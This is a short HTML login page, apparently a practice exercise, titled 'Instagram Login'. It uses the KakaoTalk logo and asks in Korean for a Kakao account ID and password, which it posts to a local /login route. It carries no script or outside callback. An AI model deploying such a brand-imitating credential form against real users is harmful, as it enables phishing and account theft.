<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8">
        <title>Instagram Login</title>
        <style>
            body {
                background-color: rgb(255, 233, 5);
                font-family: Arial, sans-serif;
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100vh;
            }
            .container {
                padding: 20px;
                border-radius: 8px;
                width: 300px;
                text-align: center;
            }
            .logo {
                justify-content: center;
                width: 190px;
                height: 125px;
                margin-bottom: 20px;
            }
            input[type="text"], input[type="password"] {
                width: calc(100% - 30px);
                padding: 10px;
                margin-bottom: 7px;
                border: 1px solid #e9dfdf;
                border-radius: 2px;
            }
            input[type="submit"] {
                width: 98%;
                padding: 7px;
                border: none;
                border-radius: 7px;
                background-color: white;
                color: black;
                cursor: pointer;
            }
            .login {
                margin-top: 10px;
                font-family:'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
            }
        </style>
    </head>
    <body>
        <div class="container">
            <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/e/e3/KakaoTalk_logo.svg" alt="Instagram Logo" width="100">
            <!-- <form> submit을 누르면 인스타화면으로 전환-->
            <form action="/login" method="post">
                <input type="text" name="id" placeholder="카카오계정 (이메일 또는 전화번호)" required><br>
                <input type="password" name="password" placeholder="비밀번호" required><br>
                <input class="login" type="submit" value="로그인">
            </form>
        </div>
    </body>
</html>